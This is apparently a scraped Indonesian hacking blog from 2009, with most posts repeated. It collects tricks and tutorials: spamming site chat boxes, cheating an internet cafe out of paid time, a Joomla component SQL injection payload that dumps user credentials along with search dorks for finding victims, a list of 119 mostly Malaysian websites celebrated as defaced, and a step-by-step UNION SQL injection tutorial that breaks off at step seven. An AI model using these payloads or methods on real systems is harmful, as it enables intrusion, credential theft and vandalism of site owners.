Nah, sekarang copas script ini ke Notepad lalu Upload ke Web Hosting anda...
var smileyList = [
[':)', 'www.shoutmix.com/smileys/smile.gif'],
[':(', 'www.shoutmix.com/smileys/sad.gif'],
[';)', 'www.shoutmix.com/smileys/wink.gif'],
[':D', 'www.shoutmix.com/smileys/grin.gif'],
[':P', 'www.shoutmix.com/smileys/tongue.gif'],
['B-)', 'www.shoutmix.com/smileys/cool.gif'],
[':">', 'www.shoutmix.com/smileys/blush.gif'],
[':((', 'www.shoutmix.com/smileys/cry.gif'],
['8-)', 'www.shoutmix.com/smileys/rolleyes.gif'],
['O_o', 'www.shoutmix.com/smileys/surprised.gif'],
['/:)', 'www.shoutmix.com/smileys/suspicious.gif'],
[':eek:', 'www.shoutmix.com/smileys/eek.gif'],
['>:)', 'www.shoutmix.com/smileys/twisted.gif'],
[':thumbsup:', 'www.shoutmix.com/smileys/thumbsup.gif'],
[':argh:', 'www.shoutmix.com/smileys/argh.gif'],
[':banghead:', 'www.shoutmix.com/smileys/banghead.gif'],
[':drool:', 'www.shoutmix.com/smileys/drool.gif'],
[':wise:', 'www.shoutmix.com/smileys/wise.gif'],
[':shrug:', 'www.shoutmix.com/smileys/shrug.gif'],
[':love:', 'www.shoutmix.com/smileys/love.gif'],
[':buttrock:', 'www.shoutmix.com/smileys/buttrock.gif'],
['^O^', 'www.shoutmix.com/smileys/notworthy.gif'],
];
Kalo anda mau bikin yang lain, tambahin aja kayak gini:
['(Teks yg ingin diganti emo)', '(url gambar emo)'],
Lalu, anda pasang JavaScript ini ke dalam Website yang ingin ditambahkan emoticons:
<script type="text/javascript" src="(URL JavaScript anda)"></script>
NAH! SEPERTI ITU RAHASIANYA!!!
---END---
Thanks to: Shoutmix
Robots.txt
Tau Googlebot? Googlebot adalah sebuah robot yang dibuat untuk mencari informasi baru dari suatu website supaya bisa mengindex di Google, tapi kita bisa kontrol Googlebot untuk tidak mengindex beberapa halaman dengan robots.txt. Nah, kita akan melihat robots.txt dari om google (Coba aja ketik di address bar: www.google.com/robots.txt), nah, sekarang udah telanjang tuh directorinya... Jadi kita bisa mendapatkan admin login lewat robots.txt
---END---
Penulis: cybermuttaqin dari Jasakom
---END---
Penulis: cybermuttaqin dari Jasakom
Senin, 21 September 2009
Menembus blocked Website ato IP kita sendiri keblok...
OK, kalo anda di kantor biasanya facebook diblok atau anda pernah bermasalah dengan webmaster ato admin jadi IP kamu tidak bisa masuk ke situs, nah, saya akan mengajarkan 2 cara untuk menebus proteksinya, yaitu:
1. Pake proxy (Gampang... ikutin aja langkah-langkah setiap tools ato add-ons)
2. Langsung pergi ke server: (kalo IP kita yang diblok, gak bisa dipake...)
cara:
- Buka cmd
- ketik "ping (address)" tanpa tanda kutip, misal: ping www.facebook.com
- Lalu copas IP addressnya
- paste ke address bar
- rebes... eh salah, beres...
HOW IT CAN BE???
1. Yep, anda pasti tau cara kerja proxy, yang gak tau, coba liat gambar-gambar dibawah ini:
Gambar atas adalah apa yang terjadi jika tidak memakai proxy, yaitu terjadi interaksi secara langsung antara Client dengan Web server.
Lalu, jika Web server diblok, ato webserver memblok ip kita, lalu kitapun memakai proxy, jadinya seperti ini:
Web server tidak berinteraksi dengan Client, jika Web server memblok IP kita, tidak akan ketauan karena IP yang terpampang disitu adalah Proxy! Jika kita yang diblok, kita koneksi ke proxy server, dan tidak langsung menyentuh Web server, jadi bisa dijelasin kayak gini:
Aldi (Client) tidak diperbolehkan keluar rumah (apapun alasannya tidak boleh!), padahal dia ingin beli permen, jadi, dia meminta pembantunya (Proxy) untuk membelikannya permen, lalu si pembantu pergi ke warung (Web server) untuk beli permen, lalu pulang memberikan permen yang dibeli ke Aldi... jadi si penjaga warung gak tau kalo Aldi yang beli... (secara tidak langsung, Aldi sudah membeli permen)
Tentang Proxy sudah, yang terakhir, cmd, mengapa bisa terjadi?
Terjadi karena website yang diblok cuma Domain name-nya doank... bukan sekaligus dengan IP-nya (tapi gak tau juga deh, kalo bossnya juga Hacker trus ngesetnya sama-sama dengan IP-nya...) Tapi kalo IP kita yang diblok sama Web Server ya pastilah gak bisa, soalnya web server gak menerima koneksi langsung kepada IP kita walaupun ngaksesnya lewat IP...
Sekian Postingannya...
---END---
1. Pake proxy (Gampang... ikutin aja langkah-langkah setiap tools ato add-ons)
2. Langsung pergi ke server: (kalo IP kita yang diblok, gak bisa dipake...)
cara:
- Buka cmd
- ketik "ping (address)" tanpa tanda kutip, misal: ping www.facebook.com
- Lalu copas IP addressnya
- paste ke address bar
- rebes... eh salah, beres...
HOW IT CAN BE???
1. Yep, anda pasti tau cara kerja proxy, yang gak tau, coba liat gambar-gambar dibawah ini:
Gambar atas adalah apa yang terjadi jika tidak memakai proxy, yaitu terjadi interaksi secara langsung antara Client dengan Web server.
Lalu, jika Web server diblok, ato webserver memblok ip kita, lalu kitapun memakai proxy, jadinya seperti ini:
Web server tidak berinteraksi dengan Client, jika Web server memblok IP kita, tidak akan ketauan karena IP yang terpampang disitu adalah Proxy! Jika kita yang diblok, kita koneksi ke proxy server, dan tidak langsung menyentuh Web server, jadi bisa dijelasin kayak gini:
Aldi (Client) tidak diperbolehkan keluar rumah (apapun alasannya tidak boleh!), padahal dia ingin beli permen, jadi, dia meminta pembantunya (Proxy) untuk membelikannya permen, lalu si pembantu pergi ke warung (Web server) untuk beli permen, lalu pulang memberikan permen yang dibeli ke Aldi... jadi si penjaga warung gak tau kalo Aldi yang beli... (secara tidak langsung, Aldi sudah membeli permen)
Tentang Proxy sudah, yang terakhir, cmd, mengapa bisa terjadi?
Terjadi karena website yang diblok cuma Domain name-nya doank... bukan sekaligus dengan IP-nya (tapi gak tau juga deh, kalo bossnya juga Hacker trus ngesetnya sama-sama dengan IP-nya...) Tapi kalo IP kita yang diblok sama Web Server ya pastilah gak bisa, soalnya web server gak menerima koneksi langsung kepada IP kita walaupun ngaksesnya lewat IP...
Sekian Postingannya...
---END---
Ghostly Shoutmix
---1|\|7R0|)U(710|\|---
Tau Shout Mix? itu lhooo diatas itu!!! Shoutmix! itu adalah tempat untuk chat dengan pengunjung website... Tapi, kita bisa menjadi hantu.
---3FF3(7---
Kita bisa jadi hantu lagi ngechat di shoutmix, jadi gak keliatan di situs tersebut. (tapi kadang-kadang gak dianggep karena kadang-kadang orang gak ngeliat berapa banyak yg online... tapi efektif jika langsung banyak-banyak user yang jadi hantu ngejunk terus)
---7U70R14|_---
1. Menuju website yang sepi (menakuti orang minimal 2 org online termasuk anda, cara melihat berapa yg online adalah liat aja gambar seperti ini di situs tersebut:
)
2. Lalu liat Source Codenya (Mozilla Serigala Api: klik View lalu View Source Code)
3. Search www.shoutmix.com, cari aja deket-deket situ ada www(nomor server).shoutmix.com/(nama shoutmix) lalu copas link tersebut ke address bar lalu Enter
4. JREENG!!! ada Sumber dari Shoutmix itu... Pake aja buat ngejunk (pake beberapa user)
---84641|\/|4|\|4 8154 73RJ4|)1?---
Karena Shoutmix pake Iframe dari suatu tempat yang disediakan untuk Shoutmix yang asli, jadi situs kita gak kebanyakan code... Tapi kita bisa menggunakannya untuk menjadi "hantu cyber" Hehehehehe...
END OF POSTING
Tau Shout Mix? itu lhooo diatas itu!!! Shoutmix! itu adalah tempat untuk chat dengan pengunjung website... Tapi, kita bisa menjadi hantu.
---3FF3(7---
Kita bisa jadi hantu lagi ngechat di shoutmix, jadi gak keliatan di situs tersebut. (tapi kadang-kadang gak dianggep karena kadang-kadang orang gak ngeliat berapa banyak yg online... tapi efektif jika langsung banyak-banyak user yang jadi hantu ngejunk terus)
---7U70R14|_---
1. Menuju website yang sepi (menakuti orang minimal 2 org online termasuk anda, cara melihat berapa yg online adalah liat aja gambar seperti ini di situs tersebut:
)2. Lalu liat Source Codenya (Mozilla Serigala Api: klik View lalu View Source Code)
3. Search www.shoutmix.com, cari aja deket-deket situ ada www(nomor server).shoutmix.com/(nama shoutmix) lalu copas link tersebut ke address bar lalu Enter
4. JREENG!!! ada Sumber dari Shoutmix itu... Pake aja buat ngejunk (pake beberapa user)
---84641|\/|4|\|4 8154 73RJ4|)1?---
Karena Shoutmix pake Iframe dari suatu tempat yang disediakan untuk Shoutmix yang asli, jadi situs kita gak kebanyakan code... Tapi kita bisa menggunakannya untuk menjadi "hantu cyber" Hehehehehe...
END OF POSTING
Stupid Moderation (Operator Warnet)
Dulu, belom ada akses Internet, saya sering pergi ke warnet (maen Dota dan maen internet) dan kami melihat ada sebuah kelemahan pada suatu warnet yaitu:
- Password setiap komputer sama (kalo kita mau maen, ngomong ke op-nya trus dikasih password, tapi setiap kompi sama passwordnya)
- Password setiap paket sama (misal: paket 1 (1 jam) password aa, paket 2 (2 jam) password aa juga... begitu seterusnya...)
- Operatornya suka maen RF (Critical Vulnerablities!!!)
Prosedur Hacking:
1. Ajak kira-kira 3 orang jika warnet sepi (batas minimal kesensitifan operator jika warnet sepi) Ajak kira-kira 7 orang jika warnet sedikit banyak, atau 9 orang jika rame (jika tempatnya pas untuk 10 orang bisa...)
2. Bilanglah ke Operator: "Mas, mau maen mas, 1 jam" lalu kamu kasih duitnya (sekedar kasih tau, 1 jam 4 ribu) Operator kasih passwordnya... Sesudah itu, suruh org laen yg kamu ajak nyalakan komp dan terserah paket berapapun (karena semua password sama)
3. Maen sepuasnya... dijamin 88% gak dicurigain karena Vulnerablities ketiga membuat Operator asik maen RF plus keramaian membuat Operator gak tau siapa aja yg tadi maen...
4. Langsung pulang, karena tadi sudah bayar... ^_^
Untested, tapi saya jamin 89,48278762% berhasil!!!
---END---
- Password setiap komputer sama (kalo kita mau maen, ngomong ke op-nya trus dikasih password, tapi setiap kompi sama passwordnya)
- Password setiap paket sama (misal: paket 1 (1 jam) password aa, paket 2 (2 jam) password aa juga... begitu seterusnya...)
- Operatornya suka maen RF (Critical Vulnerablities!!!)
Prosedur Hacking:
1. Ajak kira-kira 3 orang jika warnet sepi (batas minimal kesensitifan operator jika warnet sepi) Ajak kira-kira 7 orang jika warnet sedikit banyak, atau 9 orang jika rame (jika tempatnya pas untuk 10 orang bisa...)
2. Bilanglah ke Operator: "Mas, mau maen mas, 1 jam" lalu kamu kasih duitnya (sekedar kasih tau, 1 jam 4 ribu) Operator kasih passwordnya... Sesudah itu, suruh org laen yg kamu ajak nyalakan komp dan terserah paket berapapun (karena semua password sama)
3. Maen sepuasnya... dijamin 88% gak dicurigain karena Vulnerablities ketiga membuat Operator asik maen RF plus keramaian membuat Operator gak tau siapa aja yg tadi maen...
4. Langsung pulang, karena tadi sudah bayar... ^_^
Untested, tapi saya jamin 89,48278762% berhasil!!!
---END---
Hack Pesawat Telepon yang Terkunci
Telepon....
Buatan Alexander Graham Bell...
Ini adalah benda yang hebat karena kita bisa berkomunikasi jarak jauh...
Tapi bagaimanakah cara Menelpon dalam keadaan telepon sedang terkunci???
Semua tombol angka terkunci! bagaimana anda akan menelpon?
Inilah caranya...
1. Angkat gagang Telepon...
2. Klik tombol dialnya... (GAK TAU? itu tuh, yang tombol yang biasa buat mutusin telepon yang ada pada dudukan telepon...) sebagai ganti nomor telepon, tapi bagaimana caranya??? tekan dialnya sebanyak angka pada nomor telepon. misalnya kamu mau telepon ke 021 8943238 jadi, kamu harus memencet dial sebanyak:
- 10x lalu diam sebentar (jangan lama-lama) menandakan memencet angka 0
- 2x lalu diam sebentar menandakan memencet angka 2
- 1x lalu diam sebentar menandakan memencet angka 1
- dan seterusnya...
Nah, kesimpulannya, semua system bisa dihack...
---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD
Buatan Alexander Graham Bell...
Ini adalah benda yang hebat karena kita bisa berkomunikasi jarak jauh...
Tapi bagaimanakah cara Menelpon dalam keadaan telepon sedang terkunci???
Semua tombol angka terkunci! bagaimana anda akan menelpon?
Inilah caranya...
1. Angkat gagang Telepon...
2. Klik tombol dialnya... (GAK TAU? itu tuh, yang tombol yang biasa buat mutusin telepon yang ada pada dudukan telepon...) sebagai ganti nomor telepon, tapi bagaimana caranya??? tekan dialnya sebanyak angka pada nomor telepon. misalnya kamu mau telepon ke 021 8943238 jadi, kamu harus memencet dial sebanyak:
- 10x lalu diam sebentar (jangan lama-lama) menandakan memencet angka 0
- 2x lalu diam sebentar menandakan memencet angka 2
- 1x lalu diam sebentar menandakan memencet angka 1
- dan seterusnya...
Nah, kesimpulannya, semua system bisa dihack...
---END---
Sumber: www.spyrozone.net
Penulis: SpyroKiD
Minggu, 20 September 2009
Selamat Hari Raya Idul Fitri
Kami segenap penulis Darkness Hacker (cuma satu)
Mengucapkan Selamat Hari Raya Idul Fitri
Mohon Maaf Lahir dan Batin bagi yang merayakannya
P.S. /me gak merayakan... cuma ngasih selamat aja...
Mengucapkan Selamat Hari Raya Idul Fitri
Mohon Maaf Lahir dan Batin bagi yang merayakannya
P.S. /me gak merayakan... cuma ngasih selamat aja...
Cara memakai Exploit dari Milw0rm (SQLi Only)
Di blognya YaDoY666, Saya melihat cerita YaDoY666 melawan orgil dari Malingsial yang menyerang Wordpress dengan Joomla Exploit Jadoel...
Dan saya juga melihat bahwa Maling juga nyerang dengan copas exploit milw0rm langsung (sama-sama dengan union+select+...... padahal itu cuma exploit buat beberapa situs yang nama columnnya sama, jumlah columnnya sama, dll.)
Nah, untuk Malingsial, saya buat postingan ini supaya kalian lebih creative dan lebih pinter (maunya disuap sama gue...)
Nih Caranya:
Misalnya kita dapet Exploit ini:
POC Exploit:
http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]
Nah, yg diatas itu, bisa dijadiin dork, tapi kalo mau dork yang lebih bagus, pake inurl:com_foobla_suggestion (diatas itu letak bugsnya)
Jangan copas exploit yang ini langsung ke web yang dituju: (Ini Exploitnya, kelanjutan dari atas kalo kita lanjutin SQLi)
/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos
_users
Yang diatas CUMA DEMO, kamu harusnya mulai dari: http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=
Misalnya kita dapet korban:
http://127.0.0.1/index.php?option=com_foobla_suggestions&controller=comment&idea_id=20
Lalu kita kan lagi SQLi, kita tambahin Single Quotes kan?
Begitulah Seterusnnya... (SQLi)
OK, selamat milw0rm-ing
JADI KALO MAU COPAS JANGAN EXPLOITNYA, TAPI LETAK BUGSNYA (tapi disesuaikan juga sih sama component-nya)
Misalnya kita sudah tau kalo situs www.aaa.com punya component foobla suggestion, nah, berarti kita masukin di address bar:http://www.aaa.com/index.php?option=com_foobla_suggestions&controller=comment&idea_id=1 dan lakukan SQLi...
---END---
Dan saya juga melihat bahwa Maling juga nyerang dengan copas exploit milw0rm langsung (sama-sama dengan union+select+...... padahal itu cuma exploit buat beberapa situs yang nama columnnya sama, jumlah columnnya sama, dll.)
Nah, untuk Malingsial, saya buat postingan ini supaya kalian lebih creative dan lebih pinter (maunya disuap sama gue...)
Nih Caranya:
Misalnya kita dapet Exploit ini:
POC Exploit:
http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=[Sqlinjection]
Nah, yg diatas itu, bisa dijadiin dork, tapi kalo mau dork yang lebih bagus, pake inurl:com_foobla_suggestion (diatas itu letak bugsnya)
Jangan copas exploit yang ini langsung ke web yang dituju: (Ini Exploitnya, kelanjutan dari atas kalo kita lanjutin SQLi)
/index.php?option=com_foobla_suggestions&controller=comment&idea_id=null+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from+jos
_users
Yang diatas CUMA DEMO, kamu harusnya mulai dari: http://127.0.0.1/[path]/index.php?option=com_foobla_suggestions&controller=comment&idea_id=
Misalnya kita dapet korban:
http://127.0.0.1/index.php?option=com_foobla_suggestions&controller=comment&idea_id=20
Lalu kita kan lagi SQLi, kita tambahin Single Quotes kan?
Begitulah Seterusnnya... (SQLi)
OK, selamat milw0rm-ing
JADI KALO MAU COPAS JANGAN EXPLOITNYA, TAPI LETAK BUGSNYA (tapi disesuaikan juga sih sama component-nya)
Misalnya kita sudah tau kalo situs www.aaa.com punya component foobla suggestion, nah, berarti kita masukin di address bar:http://www.aaa.com/index.php?option=com_foobla_suggestions&controller=comment&idea_id=1 dan lakukan SQLi...
---END---
Sabtu, 19 September 2009
The Hacker, Mencari Hacker Lewat Om Google, The Dead of Noordin M Top Series...
Semua luka itu masih terasa
Semua luka itu masih membekas Semua luka itu belum mengering
Semua luka itu belum hilang dari Dari hati kami, hati bangsa Indonesia
Beberapa waktu yang lalu kau hancurkan gedung-gedung dinegara kami
Beberapa waktu yang lalu kau hancurkan fasilitas yang kami bangun dengan keringat dan air mata
Beberapa waktu yang lalu kau sakiti saudara-saudara kami
Beberapa waktu yang lalu kau bunuh saudara-saudara kami
Kau telah menghancurkan semuanya Kau telah merusak bangsa kami dengan teror bom mu
Kau telah pengaruhi saudara kami untuk menyakiti saudaranya sendiri Kau telah merusak citra negara kami sebagai negara yang aman.
Kini engkau telah mati, Kini engkau telah kehilangan ragamu
Kini engkau telah menghadapnya ditangan bom yang kau rakit
Kini engkau harus pertanggung jawabkan semua kejahatan yang telah engkau lakukan
Hey Noordin, Kematianmu tidaklah cukup untuk mengobati luka-luka dihati ini
Hey Noordin, Kematianmu tidaklah cukup untuk membalaskan semua dendam kami
Semoga tidak ada lagi orang kejam seperti mu didunia ini
Jikapun ada kami segenap bangsa indonesia siap menghadapi orang-orang laknat sepertimu
Kami bangsa yang besar, kami tidak akan pernah takut atas semua teror mu itu.
Kesedihan ini memang masih bersisa... Walaupun Densus88 udah modarin tuh Noordin M Top...
Ini adalah beberapa Website yang di-deface dalam rangka "Kematian Noordin M Top":
[Dedicated to Indonesia]
1. http://suhz.net
2. http://lumina.com.my
3. http://www.alamtimur.com.my
4. http://www.anchorlink.com.my
5. http://www.ryjia.com.my
6. http://www.plischasia.com
7. http://www.konpro-group.com
8. http://www.pentateknik.com.my
9. http://www.crafsmy.com
10. http://www.ao.com.my
11. http://brimalstampress.com
12. http://www.ysegroup.com
13. http://easypack.com.my
14. http://www.rayaco.com.my
15. http://ccssb.com
16. http://www.impiantekad.com
17. http://www.houghton.com.my
18. http://chrla.net
19. http://jiahuahang.com
20. http://amaireauto.com
21. http://www.acmecom.com
22. http://ce-products.com
23. http://www.zainalcanopy.com
24. http://malaysian-express.com
25. http://www.tempcool.com.my
26. http://www.astroace.com.my
27. http://www.malimperformance.com
28. http://www.alamigroup.com
29. http://malimperformance.com
30. http://www.tomahawk-ind.com
31. http://arinexmy.com
32. http://www.cekaptera.com
33. http://berjayasewerage.com
34. http://www.ksridhammananda.com
35. http://www.ebiza.com.my
36. http://www.air-blowers.com.my
37. http://express-marble.com
38. http://chungmeng.com
39. http://www.immanex.com
40. http://www.aanetwork.info
41. http://www.slhc.com.my
42. http://www.jim.com.my
43. http://www.mes-online.com.my
44. http://www.dav.com.my
45. http://www.de-tag.com
46. http://acmecom.com
47. http://www.eceylinco.com
48. http://perfectmetal.com
49. http://www.ctflogistics.com
50. http://www.fluidsystems.com.my
51. http://www.astrauniforms.com
52. http://www.exxo.com.my
53. http://www.cellotron.com.my
54. http://www.ceylincoseylandevelopments.com
55. http://dtm.com.my
56. http://www.cannergy.com.my
57. http://www.intestmal.com
58. http://smartdor.com
59. http://www.frangipaniflora.com.my
60. http://eceydata.com
61. http://www.coolcare.biz
62. http://www.perfectmetal.com
63. http://ebathroom.com.my
64. http://www.kampat.com.my
65. http://royalcollegegroupof70.org
66. http://www.tyden.com.my
67. http://www.tobalidockyard.com
68. http://www.casa-impian.com
69. http://www.astrauniforms.com.my
70. http://www.cablestore.com.my
71. http://faacorp.com
72. http://brglobal.com
73. http://www.formahero.com.my
74. http://www.cissacom.com
75. http://www.easypack.com.my
76. http://signvec.com
77. http://www.cambridgetech.com.my
78. http://quantumatic-automation.com
79. http://www.eepro.com.my
80. http://www.slumberland.com.sg
81. http://fluidsystems-fssb.com
82. http://www.segarasia.com
83. http://www.greenyield.com.my
84. http://www.fitness.com.my
85. ctflogistics.com
86. http://www.people-station.com
87. http://www.eceyms.info
88. http://natural-country.com
89. http://www.cann.com.my
90. http://www.eepo.com.my
91. http://hulsmalaysia.com
92. http://www.brimalstampress.com
93. http://astrauniforms.com
94. http://intestmal.com
95. http://erlatech.com
96. http://www.senstech.com.my
97. http://www.allstartravel.com.my
98. http://flushngo.com
99. http://karmakarya.my
100.http://www.halal-world.com
101. http://www.ig.upm.edu.my/
102. http://foobeeveneer.com.my/
103. http://datiwellness.com.my/
104. http://www.sensepi.com/
105. http://yangshengong.com.my/
106. http://precioustime123.com/
107. http://lead2u.com.my/
108. http://www.malaysiaworms.com/
109. http://www.penternakanlintah.com/
110. http://www.wormbreeder.com/
111. http://www.eelmalaysia.com/
112. http://www.cacingmalaysia.com/
113. http://www.ternakancacing.com
114. http://www.malaysiabelut.com/
115. http://www.cacingmerah.com/
116. http://www.caci gjohor.com/
117. http://www.wormsbreeding.com
118. http://www.malaysiacacing.com
119. http://www.cacingkompos.com
Special Thanks to: Xshadow, inc0mp13te, Bi4kKob4r, PsyChotr0n, ju4ra, Jack-, Yadoy666, Gblack, IndoUnderground, Laharisi, t3cm4n, Cyber_Tomat, SasaIndahoz, MainHack brotherhood, ABC crew, SarkemHackerlink, Xcode, Jasakom, Kaskus, #IndonesiaUnite, Densus88, YOU!!
---END---
Sumber: yadoy666.serverisdown.org
Thanks to: Semua Defacer yang mendeface web diatas...
Semua luka itu masih membekas Semua luka itu belum mengering
Semua luka itu belum hilang dari Dari hati kami, hati bangsa Indonesia
Beberapa waktu yang lalu kau hancurkan gedung-gedung dinegara kami
Beberapa waktu yang lalu kau hancurkan fasilitas yang kami bangun dengan keringat dan air mata
Beberapa waktu yang lalu kau sakiti saudara-saudara kami
Beberapa waktu yang lalu kau bunuh saudara-saudara kami
Kau telah menghancurkan semuanya Kau telah merusak bangsa kami dengan teror bom mu
Kau telah pengaruhi saudara kami untuk menyakiti saudaranya sendiri Kau telah merusak citra negara kami sebagai negara yang aman.
Kini engkau telah mati, Kini engkau telah kehilangan ragamu
Kini engkau telah menghadapnya ditangan bom yang kau rakit
Kini engkau harus pertanggung jawabkan semua kejahatan yang telah engkau lakukan
Hey Noordin, Kematianmu tidaklah cukup untuk mengobati luka-luka dihati ini
Hey Noordin, Kematianmu tidaklah cukup untuk membalaskan semua dendam kami
Semoga tidak ada lagi orang kejam seperti mu didunia ini
Jikapun ada kami segenap bangsa indonesia siap menghadapi orang-orang laknat sepertimu
Kami bangsa yang besar, kami tidak akan pernah takut atas semua teror mu itu.
Kesedihan ini memang masih bersisa... Walaupun Densus88 udah modarin tuh Noordin M Top...
Ini adalah beberapa Website yang di-deface dalam rangka "Kematian Noordin M Top":
[Dedicated to Indonesia]
1. http://suhz.net
2. http://lumina.com.my
3. http://www.alamtimur.com.my
4. http://www.anchorlink.com.my
5. http://www.ryjia.com.my
6. http://www.plischasia.com
7. http://www.konpro-group.com
8. http://www.pentateknik.com.my
9. http://www.crafsmy.com
10. http://www.ao.com.my
11. http://brimalstampress.com
12. http://www.ysegroup.com
13. http://easypack.com.my
14. http://www.rayaco.com.my
15. http://ccssb.com
16. http://www.impiantekad.com
17. http://www.houghton.com.my
18. http://chrla.net
19. http://jiahuahang.com
20. http://amaireauto.com
21. http://www.acmecom.com
22. http://ce-products.com
23. http://www.zainalcanopy.com
24. http://malaysian-express.com
25. http://www.tempcool.com.my
26. http://www.astroace.com.my
27. http://www.malimperformance.com
28. http://www.alamigroup.com
29. http://malimperformance.com
30. http://www.tomahawk-ind.com
31. http://arinexmy.com
32. http://www.cekaptera.com
33. http://berjayasewerage.com
34. http://www.ksridhammananda.com
35. http://www.ebiza.com.my
36. http://www.air-blowers.com.my
37. http://express-marble.com
38. http://chungmeng.com
39. http://www.immanex.com
40. http://www.aanetwork.info
41. http://www.slhc.com.my
42. http://www.jim.com.my
43. http://www.mes-online.com.my
44. http://www.dav.com.my
45. http://www.de-tag.com
46. http://acmecom.com
47. http://www.eceylinco.com
48. http://perfectmetal.com
49. http://www.ctflogistics.com
50. http://www.fluidsystems.com.my
51. http://www.astrauniforms.com
52. http://www.exxo.com.my
53. http://www.cellotron.com.my
54. http://www.ceylincoseylandevelopments.com
55. http://dtm.com.my
56. http://www.cannergy.com.my
57. http://www.intestmal.com
58. http://smartdor.com
59. http://www.frangipaniflora.com.my
60. http://eceydata.com
61. http://www.coolcare.biz
62. http://www.perfectmetal.com
63. http://ebathroom.com.my
64. http://www.kampat.com.my
65. http://royalcollegegroupof70.org
66. http://www.tyden.com.my
67. http://www.tobalidockyard.com
68. http://www.casa-impian.com
69. http://www.astrauniforms.com.my
70. http://www.cablestore.com.my
71. http://faacorp.com
72. http://brglobal.com
73. http://www.formahero.com.my
74. http://www.cissacom.com
75. http://www.easypack.com.my
76. http://signvec.com
77. http://www.cambridgetech.com.my
78. http://quantumatic-automation.com
79. http://www.eepro.com.my
80. http://www.slumberland.com.sg
81. http://fluidsystems-fssb.com
82. http://www.segarasia.com
83. http://www.greenyield.com.my
84. http://www.fitness.com.my
85. ctflogistics.com
86. http://www.people-station.com
87. http://www.eceyms.info
88. http://natural-country.com
89. http://www.cann.com.my
90. http://www.eepo.com.my
91. http://hulsmalaysia.com
92. http://www.brimalstampress.com
93. http://astrauniforms.com
94. http://intestmal.com
95. http://erlatech.com
96. http://www.senstech.com.my
97. http://www.allstartravel.com.my
98. http://flushngo.com
99. http://karmakarya.my
100.http://www.halal-world.com
101. http://www.ig.upm.edu.my/
102. http://foobeeveneer.com.my/
103. http://datiwellness.com.my/
104. http://www.sensepi.com/
105. http://yangshengong.com.my/
106. http://precioustime123.com/
107. http://lead2u.com.my/
108. http://www.malaysiaworms.com/
109. http://www.penternakanlintah.com/
110. http://www.wormbreeder.com/
111. http://www.eelmalaysia.com/
112. http://www.cacingmalaysia.com/
113. http://www.ternakancacing.com
114. http://www.malaysiabelut.com/
115. http://www.cacingmerah.com/
116. http://www.caci gjohor.com/
117. http://www.wormsbreeding.com
118. http://www.malaysiacacing.com
119. http://www.cacingkompos.com
Special Thanks to: Xshadow, inc0mp13te, Bi4kKob4r, PsyChotr0n, ju4ra, Jack-, Yadoy666, Gblack, IndoUnderground, Laharisi, t3cm4n, Cyber_Tomat, SasaIndahoz, MainHack brotherhood, ABC crew, SarkemHackerlink, Xcode, Jasakom, Kaskus, #IndonesiaUnite, Densus88, YOU!!
---END---
Sumber: yadoy666.serverisdown.org
Thanks to: Semua Defacer yang mendeface web diatas...
SQL Injection Full Version Revolution
Ini adalah Tutorial Lengkap (langsung copas) dari SQL Injection
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver
5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.
tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+
from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema .columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+
information_schema .columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
